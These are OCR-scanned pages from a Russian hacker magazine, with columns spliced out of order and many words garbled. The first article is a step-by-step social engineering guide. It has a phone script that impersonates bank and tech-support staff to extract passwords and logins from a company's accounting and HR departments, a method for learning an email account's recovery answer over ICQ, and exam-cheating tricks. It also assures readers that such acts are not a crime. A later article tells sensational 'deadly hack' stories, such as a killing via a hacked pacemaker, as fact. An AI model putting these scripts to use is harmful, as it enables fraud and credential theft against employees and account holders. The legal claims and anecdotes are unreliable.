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ing в таком крупном масштабе, иначе мы с TO- 
бой, пельмень, просто состаримся, обсуждая 
столь глубокую тему. Представь себя этаким 
хрычом - крупнейшим специалистом по со- 
циальной инженерии в мире :). Короче, для нас 
социальная инженерия - это нетехнические ме- 
тоды обхода систем компьютерной защиты. То 
есть мы будем хакать людей только для того, 
чтобы потом при помощи полученной от них 
информации хакнуть комп или сеть. Это и есть 
та классическая хацкерская социальная инже- 
нерия, которая нас интересует. Сомнительное 
удовольствие освещать все остальные аспекты 


Самое наимегаважное - не быть 
пассивным, не упускать инициативу 
из своих рук. Это как с девушкой 
танцевать :), ты должен вести, нап- 


равлять диалог. 


социальной инженерии я с радостью уступаю 
каким-нибудь другим перцам :). Нам с тобой - 
хацкерское, им - остальное. Вот. 


ХАЦКЕРСКИЕ “УТИЛИТЫ” 
СОЦИАЛЬНОГО ИНЖЕНЕРА 


Запомни, что наглость - самый главный хац- 
керский “софт” социального инженера. Если 
при разговоре с “клиентами” голос у тебя бу- 
дет дрожать, а заплетык языкаться :), ты ни- 
чего не добьешься! Веди себя нагло и уверен- 
но, так, как бы ты себя повел, если бы на са- 
мом деле был тем человеком, за которого се- 
бя выдаешь. Я понимаю, что не очень-то лег- 
ко проявлять твердость характера в такой 
стремной ситуации, поэтому приготовил для 
тебя несколько советов, которые помогут 
тебе круто обнаглеть :). 

Во-первых, ты должен понять, что не совер- 
шаешь абсолютно никакого преступления. 
Даже если дойдет до такой невероятной 
крайности, что тебя словят и выдадут поли- 
цаям, скорее всего, те тебя подержат в от- 
делении несколько часов и выпустят. Ведь 
если ты был словлен на стадии инженерин- 
га, значит взлом системы ты еще не успел 
осуществить. А где нет взлома, там нет и 
преступления :). Ну нет в нашем уголовном 
кодексе статей относительно таких дей- 
ствий! Тебе и условное-то не за что будет 


Мне срочно надо от- 
валивать! Я опазды- 
ваю на работу - я yc- 
троился уборщиком в 
одной премилой кон- 
торе, предоставляю- 
щей провайдерские 
услуги ;)! 


при - 
шить. Никто 

ни в одном суде не 
сможет доказать на тебя 
что-либо конкретное. Мак- 
симум, что против тебя мо- 
гут выставить - телефонное 
хулиганство (если ты рабо- 
тал по телефону). Если же 
ты ходил туда лично, то в 
самом крайнем случае тебя 
выкинут на улицу секьюри- 
ти либо уволят с должнос- 
ти, если ты на нее вообще 
устраивался - велика поте- 
ря :). 

Во-вторых, грамотно состав- 
ленную операцию по со- 
циальному хаку можно свер- 
нуть (отменить) на любом ее 
этапе. Так что, если ты даже оплошаешь, рас- 
кроешь себя, - можешь в любой момент плю- 
нуть на все и бросить это дело. Ты потеряешь 
только свое время. 

В-третьих, если ты работаешь по телефону, 
вдолби себе в голову: ты находишься очень 
далеко от тех людей, они не могут схватить 
тебя за руку, не могут увидеть твое лицо - ты 
в полной безопасности. Если определился но- 
мер твоего телефона, всегда можно сказать, 
что кто-то прикрокодилился к твоей линии из 
подъезда :). Короче говоря, занимаясь со- 
циальным инженерингом, надо очень основа- 
тельно постараться, чтобы заработать себе на 
голову неприятности. Теперь ты понял, поче- 
му хацкеры всего мира так ценят social engi- 


пеег- 
ing ;)? 
Это аб- 
солютно 
безопас- 
Ho! 
Вот еще одна 
хацкерская 
“утилита”. 
Очень эффективный метод 
- оперировать минималь- 
ной имеющейся у себя ин- 
формацией таким образом, 
чтобы “клиенту” показа- 
лось, что ты обладаешь 
полной информацией. Ты 
обязательно должен нау- 
читься это делать! Практи- 
чески, этим приходится за- 
ниматься на протяжении 
всей операции по социаль- 
ному инженерингу. Пред- 
ставь себе, что, в ходе 
твоих бесконечных поис- 
ков своей второй половины 
(хотя бы временной :)), ты наткнулся на дос- 
таточно симпатичную, но очень заумную дев- 
чонку, которая без ума от русской литерату- 
ры начала века. Для того, чтобы не попасть 
впросак, тебе надо суметь поддержать беседу 
с ней, хотя сам ты разбираешься в русской 
литературе весьма смутно - помнишь кое-ка- 
кие отрывки из школы :). Понял, о чем речь? 
В случае с социальной инженерией аналогич- 
ная ситуация. Придется привыкать, а со вре- 
менем, я думаю, ты овладеешь этой техноло- 
гией в совершенстве :). 
Поговорим немного о диалогах. Это тоже 
очень важный “софт”. Самое наимегаважное - 
не быть пассивным, не упускать инициативу 
из своих рук. Это как с девушкой танцевать 


:), ты должен вести, направлять диалог. Hu- 
когда не отвечай односложно (“Да”, “Нет”). 
Тараторь, как это делают бабульки у твоего 
подъезда. Старайся не допускать, чтобы тебе 
задавали вопросы, а сам спрашивай без уста- 
ли. Если надо, перебивай на фиг собеседника 
- не время цацкаться и показывать свою вос- 
питанность. При необходимости можешь даже 
кричать на “клиента”, обвинять его в криво- 
рукости: “Ах, вы такие растакие! Не можете 
ничего нормально сделать! Из-за васу настут 
половина всей аппаратуры полетела! Как ва- 
ша фамилия? Как? Считайте, что вас уже уво- 
лили, я сам, лично, об этом позабочусь!!!”". 
Почти на каждый хацкерский софт сущес- 
твует свой антисофт :). В социальном инже- 
неринге самым страшным врагом хацкера яв- 
ляются сотрудники службы технической под- 
держки - суппорты. Они как файрвол, как ан- 
тинюк, как антивирус... Я даже не знаю, как 
их еще обозвать! Берегись их! Эти гады отли- 
чаются от всех остальных сотрудников конто- 
ры исключительной сообразительностью. Не- 
которые из них не только очень хорошо 
знают, что такое социальная инженерия, но и 
специально “натасканы” на обнаружение та- 
кого рода атак. А чего удивляться - в их обя- 
занности входит сохранять те самые пароли, 
которые ты хочешь унести. 


ПЛАНОСТРОЕНИЕ 


Нет, косяки (даже дверные) здесь ни при 
чем ;). Мы поговорим о том, как надо пра- 
вильно планировать операции по социально- 
му инженерингу. Это тебе не пикап теток, 
где ты можешь фантазировать на ходу. 
Здесь надо все заранее и тщательно обду- 
мать. В первую очередь надо достать макси- 
мальное количество доступной информации. 
Если собираешься инженерить контору, най- 
ди на нее все: доменные имена, которыми 
она обладает, диапазон IP, адреса е-та!’ов 
различных отделови сотрудников, приблизи- 
тельное количество сотрудников, имена и 


фамилии начальников отделов, адреса офи- 
сов, номера телефонов и много-много чего 
еще. 

Копай не только Инет, но и бумажные спра- 
вочники. Если контора занимается торговлей 
либо предоставлением услуг, порыскай в 
соответствующих газетах ижурналах их 
объявления - это может круто помочь. Зара- 
нее посмотри на сайтах, посвященных поис- 
ку работы, не требуются ли этой конторе ка- 
кие-нибудь сотрудники. После того как ты 
все это соберешь и аккуратно запишешь, 
нужно будет наметить приблизительный план 
действий. Здесь очень трудно советовать 
что-либо одно, так как все зависит от кон- 
кретной ситуации. Одним из самых распрос- 
траненных способов социальной инженерии 
является социальный инженеринг по телефо- 
ну. Во-первых, тебе никуда не надо ходить, 
не надо наниматься ни на какие работы, ты 
просто звонишь в заведение, сеть которого 
надо хакнуть. Во-вторых, это самый безопас- 
ный способ :). Я опишу тебе возможный план 
социального инженеринга по телефону: Поз- 
вонить в отдел продаж, сказать, что звонишь 
по такому-то объявлению и выяснить номер 
их банковского счета. -> Определить по но- 
меру счета банк, с которым сотрудничает 
контора. -> Позвонить в бухгалтерский от- 
дел, представиться работником информа- 
ционной службы банка и сказать, что банк 
организует специальную имейл-рассылку 
для своих лучших клиентов. Если давать мы- 
ло все равно откажутся, сказать, что недавно 
разговаривал с секретарем начальства кон- 
торы, тот одобрил включение в рассылку и 
вроде уже дал мыло бухгалтерии (назвать 
мыло отдела рекламы), но не был уверен в 
его правильности, поэтому дал этот номер те- 
лефона и посоветовал позвонить и уточнить. 
-> Переждать неделю, чтоб не вызывать по- 
дозрение. -> В течение двух-трех часов 
слать на полученный бухгал терский имейл 
несколько разных резюме якобы от разных 
людей. В то же время слать на имейл отдела 


HAKEP > ФЕВРЯЛЬ 701 


кадров мессаги, по смыслу предназначенные 
бухгалтерскому отделу. -> Позвонить в бух- 
галтерию, назваться сотрудником отдела тех- 
нической поддержки и справиться, нет ли у 
них проблем с почтой. Сказать, что почтовый 
сервер от жары/холода вышел из строя и 
неправильно распределяет письма (полная 
чушь, но прокатит :)!). Посоветовать позво- 
нить в отдел кадров (при необходимости дать 
телефон), сказать, что, кажется, туда ушло 
несколько очень важных писем, предназна- 
ченных для бухгалтерии. -> Подождать пол- 
часа, пока бухгалтерия свяжется с отделом 
кадров и обменяется с ними фальшивыми 
мессагами, ругаясь попутно на жару/холод и 
на почтовый сервер. -> Позвонить в отдел 
бухгалтерии, опять назваться сотрудником 
техподдержки и затребовать у них всю ин- 
формацию, которую изначально нужно было 
выяснить (пароли, имейлы, логины и т.д.) 
якобы для того, чтобы исправить поломки. - 
> При желании, позвонить в отдел кадров и 
проделать то же самое с ними. Сложно? Да. 
Зато каков результат! На руках - вся инфор- 
мация о сети, к которой ты планировал полу- 
чить доступ. 


СОЦИАЛЬНЫЙ ИНЖЕНЕ- 
РИНГ ПРЕПОДОВ 


Хоть я и обещал не трогать все сферы приме- 
нения социальной инженерии, не имеющие 
отношения к хаку, эту одну я упустить не мо- 
гу. Во-первых, ты поймешь, как используется 
социальный инженеринг на примерах из 
реальной жизни. А во-вторых, ну очень ак- 
туальная тема ;). Тебе ведь нравится полу- 
чать хорошие оценки? Мне тоже. Всем нра- 
вится. Но западло в том, что для этого прихо- 
дится слишком много геморроиться :(. Нет, я 
ничего не имею против того, чтобы учить что- 
то полезное - нам, хацкерам, не привыкать 
(ЕТЕМ+доки), но ведь иногда попадаются та- 
кие науки, которые, даже на самый нетрез- 
вый взгляд, ну ни в какие рамки получаемой 
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Короче, для нас социальная инжене- 
рия - это нетехнические методы об- 
хода систем компьютерной защиты. 


профессии не лезут (это я о культурологии на 
факультете прикладной механики и о матана- 
лизе на факультете истории). А экзамен-то 
сдавать надо :(. Поэтому иногда приходится 
инженерить преподов, применять Ha них наши 
жестокие хацкерские методы :). Вот парочка 
хороших советов по этому поводу: 

1. Один очень эффективный способ получить 
на экзамене, как минимум, “уд”. Обычно в 
начале экзамена дают пару задач и пару воп- 
росов по теории, ты берешь все это и гото- 
BUWbCA около часа, после чего тебя к себе 
вызывает препод и выясняет, что ты знаешь, 
а что нет. Списать-то решение этих задач со 
шпор, в принципе, вполне реально. Или мож- 
но попросить/заставить кого-нибудь из 60- 
лее прилежных друзей решить задачку пря- 
мо на месте. Но когда ты идешь с этим к пре- 
поду, а он тебя спрашивает: “Вот здесь вы 
как решали?”, кроме стандартного в таких 
случаях: “Ну... 399.... MMM... это, млин, как 
его... “, у тебя ничего не получается. В этом- 
то и вся суть экзамена. Поэтому надо делать 
так: списываешь решение задачи до полови- 
ны на листок, а оставшуюся часть запоми- 
наешь (вызубриваешь, если ты в этом пред- 
мете совсем не шаришь). Потом, когда пре- 
под начнет тебя пытать, прямо при нем зада- 
чу заканчиваешь решать. Если сможешь про- 
делать эту операцию с парой задач - вообще 


супер. В большин- 
стве случаев трояк 
обеспечен, так как 
трояк - это оценка 
за знание хоть че- 
го-нибудь, а препод 
думает, раз уж ты задачу САМОСТОЯТЕЛЬНО 
(при нем) решил, значит, это самое “хоть 
что-нибудь" уже знаешь :). Наивный препод, 
хе-хе ;), 
2. Если захотеть, можно заставить препода 
решить за себя курсовую и всякие прочие 
разновидности домашнего задания. Надо ре- 
шить задачу до того места, до которого ты 
знаешь, как ее решать (если такого места в 
природе не существует, заставь друга), по- 
том ты идешь с этим к преподу после лекции 
или после семинара, делаешь умное лицо, 
суешь ему тетрадь и говоришь: “У меня пра- 
вильно?”. Он смотрит и говорит: “А где ос- 
тальное решение?”. Тут надо агрессивно, с 
видом уверенного в своей правоте человека 
заспорить: “Я этого не знаю, так как мы это- 
го не проходили и в учебниках этого тоже 
нет”. Есть большей шанс, что препод выдер- 
нет у тебя из рук тетрадку и сам решит при- 
мер (ну, или напишет теоретический ход ре- 
шения). После этого он обязательно поинте- 
ресуется: “Вспомнили? А говорите не прохо- 
дили...”. Дело в том, что у преподов тоже 
есть свои баги :). Во-первых, ты его практи- 
чески обвиняешь в том, что 
он спрашивает у тебя то, чего 
не рассказывал. Единствен- 
ный способ опровергнуть та- 
кое обвинение - показать 
элементы решения, чтобы ты 
сам все вспомнил и признал 


ответив на этот самый вопрос. Сначала подби- 
рают подходящую жертву :). Потом тыкаются 
на сайт почтовой службы, выяснив, какой 
вопрос жертве зададут, после чего ищут по 
имейлу жертву в аське и стараются разгово- 
рить ее. Желательно представиться сущес- 
твом противоположного пола ;) - так он нам- 
ного охотнее будет разговаривать. Ничего 
постыдного в этом нет, на пути к заветному 
паролю рута хакеры в ходе инженерных работ 
еще не такое вытворякт :). Мило побеседовав 
с “клиентом”, потихоньку сдвигают тему раз- 
говора в сторону секретного вопроса. Напри- 
мер, если вопрос будет “Какая кличка у моей 
собаки?”, приходится строить из себя фаната- 
кинолога, говорить, что у тебя есть собака, а 
потом спрашивать, есть ли она у него. Мол, 
собираем оригинальные собачьи клички. Ду- 
маю, ты догадаешься, к чему ведут разговор, 
если вопрос будет в стиле “Какое мое люби- 
мое кино?” или “Какой у меня рост?” :). 


Самое главное - не спешить! Может быть при- 
дется раскручивать “клиента” в течение пары 
дней или даже недели! Так его точно не спуг- 
нешь... Ой, млин! Мне срочно надо отвали- 
вать! Я опаздываю на работу - я устроился 
уборщиком в одной премилой конторе, пре- 
доставляющей провайдерские ус- 

луги ;)! 

Все, давай, пока! й 


этим свою неправоту. Во-вто- 
рых, преподам тоже нравится 
чувство = удовлетворения, 
когда в споре кому-то удается 
доказать, что он был не прав. 


НА ЧЕМ МОЖНО 
ПОТРЕНИРОВАТЬ- 
СЯ? 


Хех, да на чем угодно! Ходи по 
свету, оставляя после себя 
хаос и разрушения :). А если 
серьезно, можешь пока потре- 
нироваться на несчастных юз- 
верях. Можно попробовать 
для начала уговорить кого-ни- 
будь отдать свое мыло ;). На 
крупных почтовых серверах 
при регистрации бывает такое 
поле, куда нужно вписать спе- 
циальный вопрос и ответ на 
него. Потом, если забыл па- 
роль, его можно восстановить, 


В связи с тем, что компы стали общедоступ- 
ными (то есть комп себе смог позволить ря- 
довой потребитель), а программное обеспе- 
чение для них стоило немалых денег, появи- 
лись крякеры. Все они работали под DOS, 
так как в nix’ax проблема платного ПО реша- 
лась по-другому - программеры-энтузиасты 
писали бесплатные клоны платных прог (за 
что им ОГРОМНОЕ человеческое спасибо). 
Дошло до того, что они написали бесплат- 
ную версию UNIX’a (правда, это произошло 
чуть позже). Хакинг и фрикинг переплетают- 
ся все больше и больше, прямо пропорцио- 
нально интенсивности использования ком- 
пьютерных сетей компаниями-операторами 
телефонной связи. Персоналки и DOS наби- 
рают силу. Но хака в этой среде почти нет. 
Не, ну были, конечно, люди, которые лома- 
ли игрушки, писали вири и называли себя 
хакерами, но я их такими не считаю. Это 
крякеры и вирь-мейкеры. Были и такие, ко- 
торые занимались взломом BBS'OK, но их бы- 
ло совсем мало. 
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Ma TafibHbie BSrfnoMbi 


DONOR (LEHUN@MAIL.RU) 


1) Знаешь ли ты или нет, независимо от этого в се- 
ти идет настоящая война, иу этой войны уже есть 
свои жертвы, причем самые натуральные, с труп- 
ным ядом и соответствующим душком. 


Не влезай - убьет 


Знаешь ли ты или нет, независимо от этого в се- 
ти идет настоящая война. “Да ты чё?! Открыл 
Америку! Я сам - пробитый сетевой воин: за 
моими плечами сотни прокинутых ламерков", - 
скажешь ты в ответ, полагая, что я про ИРЦ, по- 
пертые пароли и номера кред. И ошибешься! Се- 
годня разговор про другую битву. 


Начать придется издалека... Итак, давным-дав- 
но, когда сеть была маленькой с коротенькими 
кудрявыми проводками на квадратной компью- 
терной головенке, никому и в голову не могло 
прийти, что ее можно бояться. Но маленький 
уродец постепенно рос. Сперва он проглотил 
военные ведомства и, смачно отрыгнув, закусил 
научными лабораториями. Затем - запустил свои 
цепкие пальчики в банковскую системку, опутал 
континенты и проник в частные дома - в общем, 
вошел в наш быт по самые помидоры. Больни- 
цы, аэропорты, банки, частная жизнь Вовы Пут- 
кина, а также всякая мелочь, вроде ядерных 
боеголовок и космических спутников, оказалась 
во власти милашки Интернета. Параллельно 
появились люди, которые осознали, что они - не 
такие как все, что здесь, в сети, они могут ой как 
много и что помешать им ой как трудно. Тут ла- 
моватое большинство забеспокоилось: “Как?! 
Нас имеют, а мы ничего не можем с этим поде- 
лать!" Писатели-фантасты услужливо нарисова- 


ли картинку мрачного будущего, опутанного ка- 
белями, в котором маньяк-программер в легкую 
может обворовать и закликать любого до смер- 
ти, не отдирая задницы от табуретки. Большин- 
ство сдавленно пискнуло, навалило в штаны и 
позвало папу. Папа аКа государство почесало 
репу и сказало: “Да... Нехорошо... Закон издать, 
что ли?". И вот папины спецслужбы кинулись по 
следам хакеров. И началась война между право- 
захоронительными органами и талантливыми ге- 
роями/злодеями-одиночками. Как у любой ува- 
жающей себя войны, у этой уже есть свои жер- 
твы, причем самые натуральные, с трупным 
ядом и соответствующим душком. Вот о них-то я 
тебе и расскажу. 


Смерть с китайским лицом 


Поюзай свой девайс по имени “мозг” и при- 
помни все, что знаешь про Китай, так как эти 
события произошли именно там. Правильно, 
Китай - вроде как коммунистическая страна, 
идущая строго по пути деда Мао (Цзедун ко- 
торый), поэтому рулит там партия и рулит су- 
рово. Однако в Китае также есть рыночная 
экономика, Интернет и банки. И вот в 1990 г. 
нашелся на весь Китай один смекалистый пе- 
рец по имени Фанг. Взял да и нагнул банк, в 
котором работал, на 200 000 уёв (перевел на 
фальшивые электронные счета), а потом сва- 
лил в Канаду. Партия от такой наглости офи- 
гела: мало того, что баблоз хапнул, так еще и 
опасный прецедент создал. 8 лет чувака из 
Канады выковырнуть пытались, на 9-ый вы- 
ковырнули, облегченно вздохнули... и казни- 
ли (поясняю, УМЕР ХАКЕР). Ну, кто-нибудь 
еще желает банки крякать? Нет? А вот среди 
китайцев еще два самородка нашлись. В 1999 
г. Хао Джин Лон - работник одного из филиа- 
лов Индустриального коммерческого банка 
Китая вместе со своим братом Хао Джин Ве- 
ном вломились в сеть и тиснули со счетов 720 
000 йен (87 000 грин по-нашему). Перцев 
словили (прятались плохо, не предохраня- 
лись во время секса с банком) и приговорили 
к смерти... 

Как настроение? Боевое? Тогда продолжим! 
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Смерть с таинственным 
OHLOM 


Это событие имело место быть в Германии. Жил 
в Берлине перец Флоритц, жил - не тужил, пил 
пиво, гулял с фройляночками. А кроме всего 
прочего, был он вундеркинд: ломал сотовые, пе- 
рехватывал и декодировал телефонные разгово- 
ры с высокоскоростных цифровых линий, фри- 
кал кабельное Т\ (левые декодеры делал) и те- 
лефонные карточки, крякал софт и писал непло- 
хой варез сам. Папка говорил про него так: “От 
моего сынка не скроется ни телевизор, ни газо- 
нокосилка," В 1995 г. Флоритца взяли... Но нем- 
цы - не китайцы: берегут талантливых специа- 
листов. Погрозили строго пальчиком и пригово- 
рили к испытательному сроку. Давай, мол, не 
шали, пользу приноси, а мы уж тебе и зелени 
подсыплем, и работой интересной обеспечим. 
Ясен перец, Флоритц сказал: “Не вопрос!" Пос- 
тупил он в ВУЗ, присоединился к клубу компью- 
терных энтузиастов “Хаос”. Английская фирма 
№5 (ну и название!) очень хотела иметь его... 
как специалиста, но не могла, так как парень не 
закончил колледж и не отслужил в вооруженных 
силах. Посыпались и другие предложения: от 
немецких спецслужб - похачить иранские воен- 
ные сети; от торговцев поддельными декодера- 
ми и телефонными карточками и т.д. Флоритц 
пожелал остаться независимым. И вот 17 октяб- 
ря 1998 года в 2 часа дня ему кто-то позвонил 
на мобилу. Флоритц чмокнул маму, сказал, что 
ненадолго (даже ноутбук оставил), и не вернул- 
ca... 22 октября 1998 года мирно прогуливаю- 
щиеся в парке немцы нашли его висящим на де- 
реве на собственном ремешке, Висит себе ха- 
кер-вундеркинд, хорошо висит: ни следов борь- 
бы или насилия, ни наркотиков, ничего не про- 
пало - очень похоже на самоубийство. Только 
вот странно, что хакер повесился как раз тогда, 
когда у него все пучком было. Ясно одно - под- 
весили профессионалы. Мафия или иранские 
шпионы, выбирай сам. 

О, я смотрю, ты уже нервничаешь, побледнел 
весь. Что? Говоришь: “Что за беспредел, так его 
растак?! Бедненьких хакеров сажают, лишают 
компьютера и доступа в Интернет, а лучших да- 
же убивают! Звери все!!!". Тогда взглянем на ме- 
даль со стороны ейной попы, и ты все поймешь. 


Крылатая смерть по 


телефону 


Итак, место действия - США (Ламерика). 10 
марта 1997 года Центр защиты национальной 
инфраструктуры, ФБР и другие спец. бездель- 
ники встали на уши: хакер-подросток со 
своего домашнего компьютера весело и неп- 
ринужденно “вынес” супер-пупер наворочен- 
ную цифровую систему нового поколения те- 
лефонной компании “Белл Атлантик”. Ма- 
ленький хулиган вычислил телефоны, на ко- 


торых висели модемы, используемые для уда- 
ленного обслуживания системы, и “обслужил” 
главный компьютер до потери пульса. В ре- 
зультате этой проказы у Ворчестского аэро- 
порта снесло башню =). Причем почти в пря- 
мом смысле, потому что контрольная башня, 
пожарная служба, метеослужба, охрана аэро- 
порта, а также система приема сигналов са- 
молета для включения посадочных огней бы- 
ли подрублены к этой системе. В течение 6 
часов неисправность не могли устранить - 
соответственно, самолеты не могли сесть. 
Позднее в этот же день хакер таким же мака- 
ром вломился в сеть, обслуживающую город 
Рутленд (штат Массачусетс) и изменил иден- 
тификатор системы на “Jester” (Шут). Все 
схватились за голову и начали срочно перет- 
ряхивать железо и ПО, так как этот маньяк 
еще и эксплоит написал. Служащие аэропор- 
та сработали лучше: самолеты удалось рас- 
швырять по ближайшим аэродромам, ни один 
не упал. Однако по некоторым данным кос- 
тлявая тетка все же собрала свою дань: боль- 
ной, направлявшийся на лечение в централь- 
ный госпиталь, до него не доехал... Хакера 
же нашли и приговорили к 2 годам испыта- 
тельного срока без права доступа к модему и 
иным способам связи и сетям. Несовершенно- 
летний потому что. 

А теперь представь себе, что атака на аэро- 
порт - часть хорошо спланированного терро- 
ристического акта и еще что на одном из кру- 
жащих в небе самолетов родной или близкий 
тебе человек. Как бы ты тогда отнесся к это- 
му хакеру? 


Перебазируемся в Финляндию. Финляндия - 
одна из самых компьютеризированных стран 
мира, а местная тусовка проводит в Инете до 
50% своего времени. Задумал один 20-летний 
перец избавиться от своего отчима (навер- 
ное, мешал ему в Кваку пулять, учиться зас- 
тавлял =)). Но вот незадача, отчим никак с 
сетью не связан: на самолетах не летает, пе- 
ред монитором не сидит. Ну да Инет хакера 
везде выручит! Собрал наш перец сетевых 
корефанов в конфе и стал с ними обсуждать, 
как лучше папку замочить, но в тюрьму не 
загреметь. Люди попались отзывчивые и заг- 
рузили мыло нашего героя планами идеаль- 
ных убийств по самое не горюй. Парень моз- 
гами не обделен, собрал все лучшее и на сле- 
дующий день ушел отчима на тот свет. Потом 
с друганом отвез тело на дачу. Полиция наш- 
ла труп через месяц, но доказать ничего так 
и не смогла. Наш баклан от радости такой по- 
бежал в Интернет хвастаться: вот, мол, какой 
я самец! Тут полиция его за шары и прихва- 
тила. Сгоняли к нему домой, вспороли брюхо 
Бату, а там вся переписка на 75 страницах... 


и вся недолга! 

Ну что, приятель, кошмарики еще не мучают? 
А замечал ли ты, как на тебя сосед Вася не- 
хорошо посматривает, измеряет чего-то у те- 
бя перед дверью... А ты думал, он тебе прос- 
тил тот счет на 500 гринов? А может быть в 
его мыльнице сейчас валяется сотня планов 
твоей безвременной кончины? Ну что задро- 
жал? Это еще не все, 


Смертельный оскал хирурги 


ческой мыши 


Опять США. В феврале 1999 года эта славная 
страна порадовала нас хаком, целью которо- 
го было убийство изначально. Дело было так: 
по одному крупному мафиозному делу у ФБР 
был основной свидетель. То ли прострелили 
его, то ли просто хлипкий попался, но было 
ему худо (требовалась постоянная кардиости- 
муляция и вентиляция легких). В рамках 
программы защиты свидетелей этот ценный 
фрукт был помещен в госпиталь на сурово ох- 
раняемую... нет, не платную стоянку, а воен- 
ную базу. За его здоровьем неусыпно следил 
добрый компьютер. Но злым дядькам прес- 
тупникам не хотелось в тюрьму, и наняли они 
хакера. Хакер взломал сетку военной базы и 
поиграл с настройками кардиостимулятора, и 
отключил систему вентиляции легких. Па- 
циент почему-то двинул кони... И хотя хакера 
потом изловили, свидетелю от этого легче не 
стало. 

Понял, что нельзя попадать в больницу, OCO- 
бенно если ты - свидетель? Ну ладно, не кис- 
ни - наши больницы еще очень не скоро к Ин- 
тернету подключат. 


Всем смертям смерть 


Знаешь ли ты, что слово “to hack” перево- 
дится с буржуйского на человеческий - “за- 
рубить"? Так вот, истории известен вот та- 
кой смертельный хак: Joanna Hack was 
hacked Бу a bear near town Hackwill, то есть 
Джоана Хак была хакнута медведем вблизи 
городка Хаквиль. Медведь-хакер - по сот- 
ments! =) 

Ну, перец, надеюсь, я не испугал тебя до икоты 
=). К тому же все самое интересное в будущем. 
Скоро информационная война приобретет ог- 
ромное значение. Уже сейчас передовые госу- 
дарства принимают элитных хакеров на воору- 
жение, а иногда даже специально обучают. Бу- 
дущие хаки будут еще смертельнее, еще опас- 
нее, так как хакер уже не будет опасаться ответ- 
ственности. С неба будут сыпаться ядерные бом- 
бы, самолеты, авианосцы, НЛО и хрустящие зе- 
леные бумажки. В общем, мы с тобой без дела 
не останемся. Так что пихай Х под мышку и бе- 
гом записываться в добровольцы. Кру-гом!! Се- 
ти противника ло-май!!! 


MR. FALSE: MR_FALSE@MAIL.RU 
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PUUIKU Поцента 


Фишка: Амулет. 
Хозяин фишки: Доцент. 
Этот амулет Доцент 
сделал из микросхемы, 
которая осталась у 

него еще с тех пор, 
когда он только 
начинал освоение 
цифровой техники. 


Фишка: берлога. 
Хозяин фишки: Доцент. 
Здесь, в домашней берлоге 
нашего героя, сосредоточена 
его коллекция фишек. Чего тут 
только нет, аж глаза 
разбегаются. Даже если бы мы 
целый номер по фишкам 
решили сделать - всё равно бы 
все, совершенно точно, не 
влезли. Поэтому мы поехали к 
нему в гости (в лице Доктора 
Добрянского) и 
сфотографировали всё самое 
сочное, что нам попалось на 
глаза. Доцент при этом 
безудержно рассказывал, и 
местами позировал с 
любимыми предметами. 


Фишка: Брелок с чипом от геймбоя 
Хозяин фишки: Доцент 
Киберпанковские ключи. Лишь в руках 
своего хозяина этот электронный 
высокоинтеллектуальный ключ-брелок 
иногда становится ключом. А в руках 
чужака — это всего лишь бесполезная 
железка, которой разве что пивные 
бутылки открывать. 


Фишка:Будильник а- 
ля-Дали. 

Хозяин фишки: 
Доцент. 

Как-то раз Доцент 
решил починить 
старый бабушкин 
будильник. Но, к 
сожалению, внутри 
этого чуда техники не 
нашлось ни одной 
микросхемы - только 
куча каких-то 
непонятных`колёс и 
пружинок. В механике- 
то Доцент не шибко 
шарил, и, в 
результате, 
получилось вот это. 
Зато теперь можно 
никуда не спешить — 
удильник всегла 
показывает одно и то 
же время: без 
четверти шесть. 


Фишка: Брелок а-ляДали. 
Хозяин фишки: Доцент. 
Будильника оказалось 
мало, и Доцент 
продолжил расширять 
свои познания в 
механикие, теперь уже на 
примере наручных часов. 
Брелок получился 
оригинальный. 
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Фишка: Писающий мальчик - колокольчик из 
Брюсселя. 

Хозяин фишки: Доцент. 

Это артефакт, вывезенный из Брюсселя (там ещё 
статуя такая стоит бронзовая, типа, фонтан). 
Иногда, случается, и писает... по настроению. А 
иногда - гадит по крупному. 


Фишка: Источник питания 
к железной дороге. 
Хозяин фишки: Доцент. 
Это вовсе не портативный 
пульт управления 
ядерными ракетами и не 
бомба. Это всего лишь 
источник питания с 
регулятором напряжения. 
Его Доцент собрал сам 
еще в детстве для 
управления игрушечной 
железной дорогой. А 
позднее стал 
использовать для своих 
бесчеловечных опытов с 
электричеством. 


Фишка: Телефон высокого начальства 

Хозяин фишки: Доцент. 

Настольный телефонный аппарат «Багта-50» 1960 года выпуска (так написано на 
его корпусе). Когда-то очень-очень давно, когда телефон в бывшем СССР ещё 
считался экзотикой, интернета и в помине не было, а Билл Гейтс ещё писал в 
подгузник, этот аппарат украшал рабочий стол какого-то большого начальника из 
«Ростелекома». Но и по сей день, это чудо техники не утратило 
работоспособности и теперь украшает рабочий стол Доцента. 
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Медаль, которую дали Доценту в роддоме 
Фишка №6. Золотая медаль из роддома. 
Эту медаль Доцент получил сразу после 
своего рождения. Первое место за взлом 
кода появления на свет. Аплодисменты в 
студию! 

Хозяин фишки -=ВОт@пт АКА DOceNT=- 


Фишка: Дверь в комнату 
киберпанка. 


Хозяин фишки: Доцент. 


За этой дверью живёт сам 
Доцент! Дверь украшена 
варезными релизами 
различных хак-групп на 
компакт-дисках, также 
несет на себе целую кучу 
наклеек. 
Тяжеловооруженная, в 
общем, дверь. 


Фишка: Лента от 
танкового пулемета. 
Хозяин фишки: Доцент. 
Пулемётная лента от 
башенного танкового 
nynemeéta. 
Однажды Доцент с 
Холодом путешествовали 
автостопом, глотнули 
Фанты и тормознули... 
крутейший танк Т-80. 
Водитель денег не взял 
(потому, что их ниу 
Доцента, ниу Холода не 
было)/зато дал 
пострелять из башенного 
пулемёта и подарил на 
память кусок пулемётной 
ленты. 
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Фишка: Кальян. 

Хозяин фишки: Аватар. 

Однажды Аватар раскурился, и задержал десять страниц текста во время сдачи 
спецвыпуска. И тогда Холод запихнул ему его кальян... Точно. В ухо. Кальян 


довольно тяжелый, его приятно держать в руке. Для курения есть специальный 
ароматичский табак. 


Фишка: бутаритарская 
монета. 

Хозяин фишки: Аватар. 
А ещё говорят, что 
острова Бутаритария не 
существует на свете! Вот, 
пожалуйста, 
Бутаритарская монета 
собственной персоной. 
Привезена Аватаром из 
поездки на остров 
Бутаритари. 


Фишка: железка 

Хозяева фишки: читатели Х. 

Непонятная фишка. Один знающий человек, который 
её увидел, уверенно заявил, что она раскрашена 
молотковой эмалью. Это серьёзно, но что это 
означает - непонятно. По-моему, просто эмаль так 
называется. Надпись ПЗУ очевидно означает 
«Постоянное Запоминающее Устройство», или что-то 
вроде этого. 


Conuinn)—§ Cid) ©) 


Фишка: Наручники 
охранника из клуба 
Нирвана. 
Хозяин: он и есть. 
Однажды этот гражданин 
пристегнул Аватара к 
подоконнику этими 

